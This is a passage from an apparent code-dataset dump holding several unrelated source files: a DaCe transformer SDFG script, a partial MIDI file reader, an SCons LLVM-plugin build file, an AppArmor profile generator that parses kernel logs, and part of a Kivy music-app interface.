dropout(ff, ff_dropout) + normed1\n    normed2 = layer_norm_scaled(ff_resid, norm2_scale, norm2_bias)\n    return normed2\n\n\n@dace.program\ndef dec_with_enc_attn(\n        x: dace_dtype[B, SN, N], encoder_out: dace_dtype[B, SM, N],\n        sattn_wq: dace_dtype[P, H, N], sattn_wk: dace_dtype[P, H, N],\n        sattn_wv: dace_dtype[P, H,\n                             N], sattn_wo: dace_dtype[P, H,\n                                                      N], sattn_scale: dace_dtype,\n        sattn_mask: dace_dtype[SN, SN], edattn_wq: dace_dtype[P, H, N],\n        edattn_wk: dace_dtype[P, H, N], edattn_wv: dace_dtype[P, H, N],\n        edattn_wo: dace_dtype[P, H, N], edattn_scale: dace_dtype,\n        norm1_scale: dace_dtype[N], norm1_bias: dace_dtype[N],\n        norm2_scale: dace_dtype[N], norm2_bias: dace_dtype[N],\n        norm3_scale: dace_dtype[N], norm3_bias: dace_dtype[N],\n        linear1_w: dace_dtype[emb, N], linear1_b: dace_dtype[emb],\n        linear2_w: dace_dtype[N, emb], linear2_b: dace_dtype[N],\n        sattn_dropout: dace_dtype[B, SN, N], edattn_dropout: dace_dtype[B, SN, N],\n        linear1_dropout: dace_dtype[B, SN, emb], ff_dropout: dace_dtype[B, SN, N]):\n    # Masked self-attention.\n    sattn = np.ndarray(x.shape, x.dtype)\n    attn_forward_mask(Q=x,\n                      K=x,\n                      V=x,\n                      WQ=sattn_wq,\n                      WK=sattn_wk,\n                      WV=sattn_wv,\n                      WO=sattn_wo,\n                      scaler=sattn_scale,\n                      OUT=sattn,\n                      MASK=sattn_mask,\n                      B=B,\n                      H=H,\n                      N=N,\n                      P=P,\n                      SM=SN,\n                      SN=SN)\n    # Residual connection.\n    sattn_resid = dropout(sattn, sattn_dropout) + x\n    normed1 = layer_norm_scaled(sattn_resid, norm1_scale, norm1_bias)\n\n    # Encoder-decoder attention.\n    edattn = np.ndarray(normed1.shape, dace.float32)\n    attn_forward(Q=normed1,\n                 K=encoder_out,\n                 V=encoder_out,\n                 WQ=edattn_wq,\n                 WK=edattn_wk,\n                 WV=edattn_wv,\n                 WO=edattn_wo,\n                 scaler=edattn_scale,\n                 OUT=edattn,\n                 B=B,\n                 H=H,\n                 N=N,\n                 P=P,\n                 SM=SM,\n                 SN=SN)\n\n    # Residual connection.\n    edattn_resid = dropout(edattn, edattn_dropout) + normed1\n    normed2 = layer_norm_scaled(edattn_resid, norm2_scale, norm2_bias)\n    # Feedforward network.\n    ff = linear_with_bias(\n        dropout(gelu(linear_with_bias(normed2, linear1_w, linear1_b)),\n                linear1_dropout), linear2_w, linear2_b)\n    # Residual connection.\n    ff_resid = dropout(ff, ff_dropout) + normed2\n    normed3 = layer_norm_scaled(ff_resid, norm3_scale, norm3_bias)\n    return normed3\n\n\nif __name__ == '__main__':\n    # B = 
2\n # H = 16\n # P = 64\n # N = P * H\n # SM, SN = 512, 512\n # hidden = 4 * N\n from dace.transformation.dataflow import MapFusion\n from dace.transformation.interstate import StateFusion\n\n # dace.Config.set('optimizer',\n # 'automatic_strict_transformations',\n # value=False)\n # dace.Config.set('optimizer',\n # 'automatic_strict_transformation',\n # value=False)\n\n sdfg = mha_forward.to_sdfg()\n #sdfg.apply_transformations_repeated([StateFusion])\n sdfg.save('mha3.sdfg')\n\n esdfg = encoder.to_sdfg() #strict=False)\n #esdfg.apply_transformations_repeated([StateFusion, MergeSourceSinkArrays])\n #esdfg.apply_strict_transformations()\n #esdfg.apply_transformations_repeated(MapFusion)\n esdfg.save('encoder.sdfg')\n\n dsdfg = decoder.to_sdfg()\n dsdfg.apply_strict_transformations()\n dsdfg.apply_transformations_repeated(MapFusion)\n dsdfg.save('decoder-nonstrict.sdfg')\n\n desdfg = dec_with_enc_attn.to_sdfg()\n desdfg.apply_strict_transformations()\n desdfg.apply_transformations_repeated(MapFusion)\n desdfg.save('decoder_encattn.sdfg')\n\n # Remove duplicate CUBLAS creation code. TODO: Use library nodes instead\n cublas_found = False\n for node, parent in desdfg.all_nodes_recursive():\n if isinstance(node, dace.nodes.Tasklet):\n if 'cublasHandle_t' in node.code_global:\n if cublas_found:\n node.code_global = ''\n node.code_init = ''\n node.code_exit = ''\n cublas_found = True\n\n # For compilation, ensure we link with cublas\n if os.name == 'nt':\n dace.Config.append('compiler', 'cpu', 'libs', value='cublas.lib')\n else:\n dace.Config.append('compiler', 'cpu', 'libs', value='libcublas.so')\n\n esdfg.compile(optimizer=False)\n dsdfg.compile(optimizer=False)\n desdfg.compile(optimizer=False)\n","sub_path":"substation/transformer_sdfg.py","file_name":"transformer_sdfg.py","file_ext":"py","file_size_in_byte":13570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
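A quick way to sanity-check the `mha_forward` program above is to call it with small concrete sizes. The driver below is a sketch, not part of the original file: it assumes `B, H, P, N, SM, SN` are `dace.symbol`s and `dace_dtype` is `dace.float32`, consistent with the annotations, and it passes the symbol values explicitly alongside the arrays, which older DaCe versions require.

```python
# Hypothetical test driver for mha_forward; names and sizes are mine.
import numpy as np

B_, H_, P_, SM_ = 2, 4, 16, 8
N_ = P_ * H_  # embedding size, matching the commented-out defaults above

x = np.random.rand(B_, SM_, N_).astype(np.float32)
wq, wk, wv, wo = (np.random.rand(P_, H_, N_).astype(np.float32)
                  for _ in range(4))

# Self-attention: q = k = v = x; free symbols passed with the data.
out = mha_forward(x, x, x, wq, wk, wv, wo,
                  scaler=np.float32(1.0 / np.sqrt(P_)),
                  B=B_, H=H_, P=P_, N=N_, SM=SM_, SN=SM_)
print(out.shape)  # expected (2, 8, 64)
```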
+{"seq_id":"317196622","text":"\"\"\"\nAn incomplete MIDI file reader.\n\nReads most MIDI files, but fails with others.\n\nTodo:\n - return MetaMessages along with Messages?\n - join sysex messages (0xf0...0xf7, 0xf7...0xf7, ...)\n - handle the too short files listed below:\n\n mid2/Portsmouth.mid\n mid1/acso3op2.mid\n\nReferences:\n\nhttp://www.sonicspot.com/guide/midifiles.html\nhttp://www.ccarh.org/courses/253/assignment/midifile/\nhttps://code.google.com/p/binasc/wiki/mainpage\nhttp://stackoverflow.com/questions/2984608/midi-delta-time\nhttp://www.recordingblogs.com/sa/tabid/82/EntryId/44/MIDI-Part-XIII-Delta-time-a\nhttp://www.sonicspot.com/guide/midifiles.html\n\"\"\"\n\nfrom __future__ import print_function\nimport sys\nimport mido\nfrom collections import deque\nfrom .messages import BaseMessage\n\nclass ByteReader(object):\n    def __init__(self, stream):\n        self.stream = stream\n        self.data = deque()\n\n        for line in stream:\n            self.data.extend(bytearray(line))\n\n        self._pos = 0\n\n    def read_list(self, n):\n        return [self.read_byte() for _ in range(n)]\n\n    def read_bytes(self, n):\n        return bytes(self.read_list(n))\n\n    def read_bytearray(self, n):\n        return bytearray(self.read_list(n))\n\n    def read_byte(self):\n        \"\"\"Get the next byte from the stream.\"\"\"\n        try:\n            self._pos += 1\n            return self.data.popleft()\n        except IndexError:\n            raise EOFError('end of file reached')\n\n    def put_back_byte(self, byte):\n        \"\"\"Put a byte back.\n\n        This can be used for look-ahead.\"\"\"\n        self.data.appendleft(byte)\n        self._pos -= 1\n\n    def tell(self):\n        return self._pos\n\n    def __enter__(self):\n        return self\n\n    def __exit__(self, type, value, traceback):\n        return False\n\n    def __iter__(self):\n        while 1:\n            yield self.data.popleft()\n\n\ndef dbg(*args):\n    print(*args)\n\n\ndef dbg2(*args):\n    print(*args)\n\n\nclass FileReader(ByteReader):\n    def read_byte(self):\n        byte = ByteReader.read_byte(self)\n        # dbg('{:02x} @ {:02x}'.format(byte, self.tell()))\n        return byte\n\n    def put_back_byte(self, byte):\n        ByteReader.put_back_byte(self, byte)\n        # dbg('{:02x} put back'.format(byte))\n\n    def read_short(self):\n        a, b = [self.read_byte() for i in range(2)]\n        return a << 8 | b\n\n    def read_long(self):\n        a, b, c, d = [self.read_byte() for i in range(4)]\n        return a << 24 | b << 16 | c << 8 | d\n\n\nclass EndOfTrack(IOError):\n    pass\n\n\nclass MetaMessage(BaseMessage):\n    def __init__(self, type, data):\n        self.type = 'meta'\n        self.meta_type = type\n        self.data = data\n        self.time = 0\n\n    def __repr__(self):\n        return '<meta message type={} data={!r} time={}>'.format(\n            self.meta_type, self.data, self.time)\n\n\nclass MidiFile:\n    def __init__(self, filename):\n        self.filename = filename\n        self.tracks = []\n        self._current_track = []\n        self._running_status = None\n\n        with FileReader(open(filename, 'rb')) as self.file:\n            # Read header (16 bytes)\n            magic = self.file.read_bytearray(4)\n            if not magic == bytearray(b'MThd'):\n                # Todo: raise some other error?\n                raise ValueError('not a MIDI file')\n\n            header_size = self.file.read_long()\n\n            self.file_format = self.file.read_short()\n            self.number_of_tracks = self.file.read_short()\n            self.ticks_per_quarter_note = self.file.read_short()\n\n            # dbg('--- File format: {}'.format(self.file_format))\n\n            self._read_tracks()\n    \n    def _print_tracks(self):\n        for i, track in enumerate(self.tracks):\n            print('=== Track {}'.format(i))\n            for event in track:\n                print('  ', repr(event))\n\n    def _read_delta_time(self):\n        delta = 0\n\n        while 1:\n            byte = self.file.read_byte()\n            delta = (delta << 7) | (byte & 0x7f)\n            if not byte & 0x80:\n                break\n\n        # dbg(' 
delta time', delta)\n return delta\n\n def _read_meta_event(self):\n type = self.file.read_byte()\n length = self.file.read_byte()\n data = self.file.read_bytes(length)\n\n # dbg(' meta event {:02x} {} {!r}'.format(type, length, data))\n event = MetaMessage(type, data)\n if type == 0x2f:\n # dbg(' found end of track')\n raise EndOfTrack('end of track found')\n\n return event\n\n\n def _read_message(self, status_byte):\n # dbg('+')\n\n # Todo: not all messages have running status\n if status_byte < 0x80:\n # dbg(' --- {}'.format('running status'))\n if self._running_status is None:\n # dbg(' *** {}'.format('no previous status byte!'))\n return\n status_byte = self._running_status\n # self.file.put_back_byte(status_byte)\n else:\n self._running_status = status_byte\n\n try:\n spec = mido.messages.get_spec(status_byte)\n except LookupError:\n # dbg2(' *** unknown status byte {:02x}'.format(status_byte))\n sys.exit(1)\n\n bytes = [status_byte]\n\n for i in range(spec.length - 1):\n bytes.append(self.file.read_byte())\n\n # dbg(' bytes for message: {}'.format(bytes))\n\n # message = mido.parse(bytes)\n message = build_message(spec, bytes)\n # dbg(' {}'.format(message))\n\n return message\n\n\n def _read_sysex(self):\n length = self.file.read_byte()\n data = self.file.read_list(length)\n if data[-1] == 0xf7:\n data = data[:-1]\n\n message = mido.Message('sysex', data=data)\n # dbg(' {}'.format(message))\n\n return message\n\n\n def _read_event(self, delta):\n status_byte = self.file.read_byte()\n\n if status_byte == 0xff:\n event = self._read_meta_event()\n\n elif status_byte == 0xf0:\n event =self._read_sysex()\n\n elif status_byte == 0xf7:\n event = self._read_sysex() # Todo: continuation of previous sysex\n\n else:\n event = self._read_message(status_byte)\n\n if event is not None:\n event.time = delta\n self._current_track.append(event)\n\n\n def _read_track(self):\n magic = self.file.read_bytearray(4)\n if magic != bytearray(b'MTrk'):\n raise ValueError(\"track doesn't start with 'MTrk'\")\n\n length = self.file.read_long() # Ignore this.\n\n # dbg('******** found track of length', length)\n\n self._current_track = []\n self._running_status = None\n\n start = self.file.tell()\n\n while 1:\n try:\n # End of track reached\n if self.file.tell() - start == length:\n break\n\n # dbg(' !{} {}'.format(length, self.file.tell() - start))\n delta = self._read_delta_time()\n self._read_event (delta)\n except EndOfTrack:\n break\n\n self.tracks.append(self._current_track)\n self._current_track = []\n\n def _read_tracks(self):\n try:\n for i in range(self.number_of_tracks):\n self._read_track()\n except EOFError:\n # dbg(' wrong number of tracks (reached end of file')\n # dbg(' while reading track ')\n # dbg(' {} of {})'.format(i, self.number_of_tracks))\n pass\n # print(self.file.tell())\n\n# mid1/acso3op2.mid:\n# 00008b0: 00c0 0604 b05b 5400 5d5d 8168 0a58 0307\n# (prog )(control )(? ... )(note off)(? )\n#\n# 00008c0: 7f81 4a90 4057 0043 5901 4854 1940 0001\n# (off ? ) (? )\n","sub_path":"mido/midifiles.py","file_name":"midifiles.py","file_ext":"py","file_size_in_byte":7798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
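The `_read_delta_time` loop above decodes a MIDI variable-length quantity: each byte contributes its low seven bits (`& 0x7f`) and the high bit marks continuation. A self-contained sketch of the same decoding, with check values taken from the MIDI spec:

```python
# Standalone VLQ decoder matching _read_delta_time's logic (sketch, not
# part of the module). 0x81 0x48 decodes to (1 << 7) | 0x48 = 200 ticks.
def decode_vlq(data):
    value = 0
    for byte in data:
        value = (value << 7) | (byte & 0x7f)
        if not byte & 0x80:  # high bit clear: last byte of the quantity
            break
    return value

assert decode_vlq([0x00]) == 0
assert decode_vlq([0x81, 0x48]) == 200
assert decode_vlq([0xff, 0x7f]) == 16383  # largest two-byte delta
```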
+{"seq_id":"192482176","text":"########################################################################\n#\n# path to Tristan Ravitch's iiglue analyzer\n\nfrom os import access, environ, X_OK\nfrom SCons.Script import *\n\ndef pathIsExecutable(key, val, env):\n found = env.WhereIs(val)\n if found: val = found\n PathVariable.PathIsFile(key, val, env)\n if not access(val, X_OK):\n raise SCons.Errors.UserError('Path for option %s is not executable: %s' % (key, val))\n\ndef pathIsOptionalExecutable(key, val, env):\n if val:\n pathIsExecutable(key, val, env)\n\nvariables = Variables(['.scons-options'], ARGUMENTS)\nvariables.Add(PathVariable('IIGLUE', 'Path to iiglue executable', '/p/polyglot/public/bin/iiglue', pathIsOptionalExecutable))\n\ndefault = WhereIs('llvm-config', (\n '/p/polyglot/public/bin',\n '/usr/bin',\n))\nvariables.Add(PathVariable('LLVM_CONFIG', 'Path to llvm-config executable', default, pathIsExecutable))\n\n########################################################################\n#\n# common basis for all build environments\n#\n\nenv = Environment(\n tools=(\n 'default', # load first, so others can override\n 'bitcode',\n 'clang-analyzer',\n 'expect',\n 'iiglue',\n 'plugin',\n ),\n toolpath=(\n 'scons-tools',\n ),\n variables=variables,\n)\n\nHelp(variables.GenerateHelpText(env))\nvariables.Save('.scons-options', env)\n\n\n########################################################################\n#\n# LLVM configuration\n#\n\nfrom distutils.version import StrictVersion\n\ndef llvm_version(context):\n context.Message('checking LLVM version ... ')\n succeeded, output = context.TryAction('$LLVM_CONFIG --version >$TARGET')\n if succeeded:\n result = output.rstrip('\\n')\n context.env['llvm_version'] = result\n context.Result(result)\n return result\n else:\n context.Result('failed')\n context.env.Exit(1)\n\ndef llvm_bindir(context):\n context.Message('checking LLVM executables ... 
')\n succeeded, output = context.TryAction('$LLVM_CONFIG --bindir >$TARGET')\n if succeeded:\n output = output.rstrip()\n context.env.PrependENVPath('PATH', output)\n context.Result(output)\n return output\n else:\n context.Result('failed')\n context.env.Exit(1)\n\nconf = Configure(env, custom_tests={\n 'LLVMVersion': llvm_version,\n 'LLVMBinDir': llvm_bindir,\n })\n\nconf.LLVMVersion()\nconf.LLVMBinDir()\nenv = conf.Finish()\n\n\n########################################################################\n#\n# build environment for compiling LLVM plugins\n#\n\npenv = env.Clone(\n CXXFLAGS=('-Wall', '-Wextra', '-Werror', '-std=c++11'),\n CPPPATH='/unsup/boost-1.55.0/include',\n INCPREFIX='-isystem ',\n LIBS=('LLVM-$llvm_version',),\n)\n\npenv.PrependENVPath('PATH', '/s/gcc-4.9.0/bin')\npenv.ParseConfig('$LLVM_CONFIG --cxxflags --ldflags')\npenv.AppendUnique(\n CCFLAGS=(\n '-fexceptions',\n '-frtti',\n ), delete_existing=True)\n\nplugin, = penv.SharedLibrary('CArrayIntrospection', (\n 'BacktrackPhiNodes.cc',\n 'IIGlueReader.cc',\n 'FindSentinels.cc',\n 'NullAnnotator.cc',\n))\n\nenv['plugin'] = plugin\n\nAlias('plugin', plugin)\n\n\n########################################################################\n#\n# compilation database for use with various Clang LibTooling tools\n#\n\n\nimport json\n\ndef compilation_database(env, topdir):\n for obj in plugin.sources:\n src, = obj.sources\n yield {\n 'directory': topdir,\n 'file': src.path,\n 'command': env.subst('$SHCXXCOM', target=obj, source=src),\n }\n\ndef stash_compile_commands(target, source, env):\n sconstruct, topdir = source\n target, = target\n commands = list(compilation_database(env, topdir.read()))\n json.dump(commands, open(str(target), 'w'), indent=2)\n\npenv.Command('compile_commands.json', ('SConstruct', Value(Dir('#').abspath)), stash_compile_commands)\n\n\n########################################################################\n#\n# subdirectories\n#\n\nSConscript(dirs='tests', exports='env')\n\n\n# Local variables:\n# flycheck-flake8rc: \"scons-flake8.ini\"\n# End:\n","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
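The `llvm_version` and `llvm_bindir` checks follow SCons's custom-test protocol (`context.Message`, `context.TryAction`, `context.Result`). A third probe in the same style would look like the sketch below; `--libdir` is a real `llvm-config` flag, but wiring it into this particular build is illustrative, not taken from the file.

```python
def llvm_libdir(context):
    # Same Configure protocol as the probes above (sketch, not in the build).
    context.Message('checking LLVM library directory ... ')
    succeeded, output = context.TryAction('$LLVM_CONFIG --libdir >$TARGET')
    if succeeded:
        output = output.rstrip()
        context.env['llvm_libdir'] = output
        context.Result(output)
        return output
    else:
        context.Result('failed')
        context.env.Exit(1)

# Registered alongside the existing tests:
# conf = Configure(env, custom_tests={..., 'LLVMLibDir': llvm_libdir})
# conf.LLVMLibDir()
```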
+{"seq_id":"644120962","text":"\"\"\"\nApparmor Profile Generator\nby PG @ Synology\nReleased Under the MIT License\n\"\"\"\n\nconfig_webAPI_only = False\nconfig_use_filter = True\nconfig_log_path = '/var/log/kern.log'\nfilter_list = ['operation=\"profile_remove\"', 'operation=\"profile_load\"']\n\n\nimport re,fileinput,sys\n\nfilter_list_p = []\nfor filter in filter_list:\n\tfilter_list_p.append(re.compile(filter))\n\nif config_webAPI_only:\n\tlist_all_p = '([A-Za-z0-9\\.]+)' + '(/[^\\\"]*)?\"'\n\tprofile_base_p = 'profile=\"/usr/syno/synoman/webapi/entry.cgi//'\nelse:\n\tlist_all_p = '([^\\\"]+)' + '\"'\n\tprofile_base_p = 'profile=\"'\n\ndef analyze(target, lines):\n\trule_p = re.compile('name=\"([^\\\"]+)\".+requested_mask=\"([A-Za-z]+)\"')\n\tcapability_p = re.compile('capname=\"([^\\\"]+)\"')\n\tnetwork_p = re.compile('family=\"([a-z]+)\" sock_type=\"([a-z]+)\"')\n\t#target = 'SYNO.Core.Security.DSM'\n\t\n\ttarget_p = re.compile(profile_base_p + re.escape(target) + '(/[^\\\"]*)?\"')\n\ttarget_grep_p = re.compile(re.escape(target))\n\tdata = {}\n\tcapability_data = {}\n\tnetwork_data = {}\n\tparse_fail = []\n\tcnt = 0\n\thit_cnt = 0\n\n\tfor line in lines:\n\t\tcnt = cnt + 1\n\n\t\tif not target_grep_p.search(line):\n\t\t\tcontinue\n\t\tresult = rule_p.search(line)\n\t\tcapability_result = capability_p.search(line)\n\t\tnetwork_result = network_p.search(line)\n\t\tif not (result or capability_result or network_result):\n\t\t\tparse_fail.append(line)\n\t\t\tcontinue\n\n\t\thit_cnt = hit_cnt + 1\n\n\t\tif result:\n\t\t\tpath = result.group(1)\n\t\t\trequested_mask = result.group(2)\n\t\t\tif path not in data:\n\t\t\t\tdata[path] = {}\n\t\t\tif requested_mask not in data[path]:\n\t\t\t\tdata[path][requested_mask] = {}\n\t\t\t\tdata[path][requested_mask]['count'] = 0;\n\t\t\t\tdata[path][requested_mask]['cmd'] = []; \n\t\t\tdata[path][requested_mask]['count'] = data[path][requested_mask]['count'] + 1\n\t\telif capability_result:\n\t\t\tcapibility_name = capability_result.group(1)\n\t\t\tif capibility_name not in capability_data:\n\t\t\t\tcapability_data[capibility_name] = 0;\n\t\t\tcapability_data[capibility_name] = capability_data[capibility_name] + 1\n\t\telif network_result:\n\t\t\tfamily = network_result.group(1)\n\t\t\tsock_type = network_result.group(2)\n\t\t\tkey = (family, sock_type)\n\t\t\tif key not in network_data:\n\t\t\t\tnetwork_data[key] = 0\n\t\t\tnetwork_data[key] = network_data[key] + 1\n\t\telse :\n\t\t\tprint('SHOUD NOT BE HERE, call PG plz')\n\n\tprint('\\033[1;33m{0} {1} matched \\033[0m'.format(target, hit_cnt, cnt))\n\n\tfor path in sorted(data):\n\t\toutput = []\n\t\tfor mask in data[path]:\n\t\t\toutput.append(mask)\n\t\tsys.stdout.write('{0:50}'.format(path))\n\t\tfor i in output:\n\t\t\tsys.stdout.write(' ' + i)\n\t\tprint(',')\n\tfor name in sorted(capability_data):\n\t\tprint('capability {0},'.format(name))\n\tfor key in sorted(network_data):\n\t\tprint('network {0:6}{1},'.format(key[0], key[1]))\n\n\tif len(parse_fail) > 0:\n\t\tprint('\\033[0;31mUntracked List\\033[0;31m')\n\t\tfor line in parse_fail:\n\t\t\tprint('\\033[0;31m {0} \\033[0m'.format(line))\n\ndef list_profiles(lines):\n\tdata = {}\n\tret = []\n\ttarget_p = re.compile(profile_base_p + list_all_p)\n\tfor line in lines:\n\t\tresult = target_p.search(line)\n\t\tif not result:\n\t\t\tcontinue\n\t\tdata[result.group(1)] = 1\n\tfor webapi in sorted(data):\n\t\tret.append(webapi)\n\treturn ret\n\t\t#print(result.group(2))\n\nif __name__ == '__main__':\n\tlines = []\n\tfilter_cnt = 0\n\n\tif 
len(sys.argv) < 2:\n\t\tprint('Usage : \\n {0} --all \\n {0} --list \\n {0} webapi'.format(__file__))\n\t\texit()\n\n\tdef chk_filter(line):\n\t\tfor p in filter_list_p:\n\t\t\tif p.search(line):\n\t\t\t\treturn True\n\t\treturn False\n\n\tfor line in fileinput.input(config_log_path):\n\t\tif config_use_filter:\n\t\t\tif chk_filter(line):\n\t\t\t\tfilter_cnt = filter_cnt + 1\n\t\t\t\tcontinue\n\t\tlines.append(line)\n\tprint('\\033[0;32mlog size: {0} lines, {1} were removed by filter\\033[0m'.format(len(lines), filter_cnt))\n\n\t\n\t\n\tif sys.argv[1] == '--list':\n\t\tprint(list_profiles(lines))\n\t\texit()\n\n\tif sys.argv[1] == '--all':\n\t\tprofile_list = list_profiles(lines)\n\t\tfor profile in profile_list:\n\t\t\tanalyze(profile, lines)\n\t\tprint(\"\\033[0;32m============================================================\\033[0m\")\n\t\texit()\n\n\tanalyze(sys.argv[1], lines)\n","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
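The analyzer keys on the `name=`/`requested_mask=`, `capname=`, and `family=`/`sock_type=` fields of AppArmor audit records. A synthetic example of what `rule_p` extracts from a kern.log line; the log text below is fabricated but follows the kernel's audit format:

```python
import re

line = ('kernel: audit: type=1400 apparmor="DENIED" operation="open" '
        'profile="/usr/syno/synoman/webapi/entry.cgi" name="/etc/shadow" '
        'pid=1234 comm="entry.cgi" requested_mask="r" denied_mask="r"')

rule_p = re.compile('name="([^"]+)".+requested_mask="([A-Za-z]+)"')
m = rule_p.search(line)
print(m.group(1), m.group(2))  # /etc/shadow r
```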
+{"seq_id":"438507988","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nsys.path.insert(0, os.path.abspath('..'))\n\nfrom kivy import metrics\nfrom kivy.uix.button import Button\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.graphics import Color, Ellipse\nfrom kivy.clock import Clock as kivyClock\nfrom kivy.uix.image import Image\nfrom kivy.core.window import Window\nfrom kivy.uix.popup import Popup\nfrom kivy.app import App\nfrom kivy.uix.gridlayout import GridLayout \nfrom kivy.uix.button import Button \nfrom kivy.uix.dropdown import DropDown \n\nfrom common.screen import ScreenManager, Screen\nfrom common.gfxutil import topleft_label, CEllipse, KFAnim, AnimGroup, CLabelRect\nfrom common.core import BaseWidget, run\nfrom common.metro import Metronome\nfrom common.wavesrc import WaveFile\nfrom common.clock import Clock, SimpleTempoMap, AudioScheduler, kTicksPerQuarter, quantize_tick_up\nfrom kivy.graphics.instructions import InstructionGroup\nfrom kivy.graphics import Color, Ellipse, Line, Rectangle\nfrom kivy.uix.boxlayout import BoxLayout \nfrom kivy.uix.label import Label\nfrom kivy.uix.behaviors import ButtonBehavior, ToggleButtonBehavior\nfrom ashika_play_area.input_demo import *\n\nfrom graphics import Scene\n\n \n## not necessary while using .kv file \nfrom kivy.uix.checkbox import CheckBox \n# To do some manupulation on window impoet window \nfrom kivy.core.window import Window \nfrom kivy.factory import Factory\nfrom kivy.config import Config\nConfig.set('graphics', 'resizable', False)\nConfig.set('graphics', 'height', '450')\nConfig.set('graphics', 'width', '800')\n\n\nfont_sz = metrics.pt(20)\nbutton_sz = metrics.pt(100)\nTHEME = {\n \"red\": Color(1,0,0),\n \"dark-red\": Color(.5,0,0),\n \"white\": Color(1, 1, 1),\n \"black\": Color(0, 0, 0),\n}\n\n\nclass Checkboxes():\n def __init__(self, labels_and_defaults):\n self.labels = {}\n self.init_active = {}\n for group in labels_and_defaults:\n labels, index_active = labels_and_defaults[group]\n self.labels[group] = labels\n self.init_active[group] = index_active\n\n def get_labels_dict(self):\n return self.labels.copy()\n\n def get_init_active_dict(self):\n return self.init_active.copy()\n\n\n##################### INSTRUMENTS!! #########################\n# {group: (labels_list, default_index_selected)}\nINSTRUMENT_CHECKBOXES = Checkboxes({\n \"high voice\": ([\"piano\", \"violin\", \"guitar\", \"flute\"], 0),\n \"mid voice\": ([\"piano\", \"viola\", \"guitar\"], 0),\n \"low voice\": ([\"piano\", \"cello\", \"bass\"], 0)\n})\nALL_PIANO_SELECTED = {\n \"high voice\": 0,\n \"mid voice\": 0,\n \"low voice\": 0\n}\nORCHESTRA = {\n \"high voice\": 1,\n \"mid voice\": 1,\n \"low voice\": 1\n}\nPOP = {\n \"high voice\": 0,\n \"mid voice\": 2,\n \"low voice\": 2\n}\n# ... and so on! keep filling this out\n# use set_checkboxes(ORCHESTRA) to set checkboxes\n##############################################################\n\n######################## GENRES!! 
############################\nGENRE_CHECKBOXES = Checkboxes({\n \"GENRE\": ([\"classical\", \"pop\", \"Coming\\nsoon!\"], 0)\n})\n##############################################################\n\nclass StartPopup(Popup):\n def __init__(self, **kwargs):\n super(StartPopup, self).__init__(**kwargs)\n\n\nclass VolumePopup(Popup):\n def __init__(self, callback):\n super(VolumePopup, self).__init__()\n self.slider_callback = callback # takes in (slider_id, value)\n\n\n\nclass CheckboxPopup(Popup):\n def __init__(self, callback, title, checkboxes):\n super(CheckboxPopup, self).__init__()\n self.instrument_callback = callback\n \n self.title = title\n self.checkbox_labels = checkboxes.get_labels_dict()\n\n # set up checkboxes\n self.checkboxes = {}\n max_items = -1 # for checkbox layout\n for group in self.checkbox_labels:\n max_items = max(len(self.checkbox_labels[group]), max_items)\n self.checkboxes[group] = []\n\n # creating the checkbox layout\n self.layout = GridLayout(cols = (max_items+1))\n for i in self.checkbox_labels:\n self.layout.add_widget(SimpleLabel(text=i))\n checkbox_list = self.checkbox_labels[i]\n\n # fills in checkboxes and labels\n for j in range(len(checkbox_list)):\n box_layout = BoxLayout()\n item = checkbox_list[j]\n current_checkbox = CheckBox(group = i)\n current_checkbox.bind(on_press=self.on_checkbox_active)\n self.checkboxes[i].append(current_checkbox)\n box_layout.add_widget(current_checkbox)\n box_layout.add_widget(SimpleLabel(text=item))\n self.layout.add_widget(box_layout)\n\n # creates fillers\n for j in range(max_items-len(checkbox_list)):\n self.layout.add_widget(BoxLayout())\n self.content = self.layout\n\n\n # sets the current choices as active\n self.set_checkboxes(checkboxes.get_init_active_dict())\n \n def set_checkboxes(self, option_dict):\n '''\n Takes in a dictionary of group: index\n looks like self.init_active\n sets new items as active\n '''\n for group in option_dict:\n new_index = option_dict[group]\n group_checkboxes = self.checkboxes[group]\n group_checkboxes[new_index]._do_press()\n\n def on_checkbox_active(self, checkbox_instance):\n if checkbox_instance.active:\n group = checkbox_instance.group\n index = self.checkboxes[group].index(checkbox_instance)\n label = self.checkbox_labels[group][index]\n print(group, label)\n self.instrument_callback(label, group)\n else:\n checkbox_instance._do_press()\n \n\nclass SimpleLabel(Label):\n pass\n\n\nclass StoragePopup(Popup):\n def __init__(self, get_wave_callback, set_wave_callback):\n super(StoragePopup, self).__init__()\n self.get_wave_callback = get_wave_callback\n self.set_wave_callback = set_wave_callback\n self.wave_gens = {}\n\n # on record button press, select a wave generator\n # on save button press, set a wave generator to current wave\n # on play button press, set live wave to selected button\n \n def on_play_button_press(self):\n current_index_selected = self.get_selected_index()\n if current_index_selected < 0:\n return\n if current_index_selected not in self.wave_gens.keys():\n return\n # get the saved recording\n new_wave_gen, sequencers = self.wave_gens[current_index_selected]\n # replace the live wave in the larger scene\n self.set_wave_callback(new_wave_gen, sequencers)\n\n def on_save_button_press(self):\n current_index_selected = self.get_selected_index()\n if current_index_selected<0:\n return\n\n # save the current live wave into self.wave_gens[current_index_selected]\n current_wave_and_seqs = self.get_wave_callback()\n if not current_wave_and_seqs:\n return\n 
self.wave_gens[current_index_selected] = current_wave_and_seqs\n\n # indicate whether a wave generator is saved at a certain index\n\n\n def get_selected_index(self):\n # gets the index of the button which is presently selected\n # returns -1 if no button is selected\n widgets = ToggleButtonBehavior.get_widgets('storage')\n index = -1\n for idx in range(len(widgets)):\n widget = widgets[idx]\n if widget.state == \"down\":\n index = idx\n return index\n\n \n\n\n\nclass RecordPopup(Popup):\n def __init__(self, record_callback, play_callback):\n super(RecordPopup, self).__init__()\n self.record_callback = record_callback\n self.play_callback = play_callback\n self.mic_meter = MeterDisplay((140, 90), 100, (-96, 0), (.1, .9, .3))\n self.mic_graph = GraphDisplay((200, 90), 100, 160, (-96, 0), (.1, .9, .3))\n\n self.pitch_meter = MeterDisplay(\n (140, 210), 100, (30, 90), (.9, .1, .3))\n self.pitch_graph = GraphDisplay(\n (200, 210), 100, 160, (30, 90), (.9, .1, .3))\n\n self.canvas.add(self.mic_meter)\n 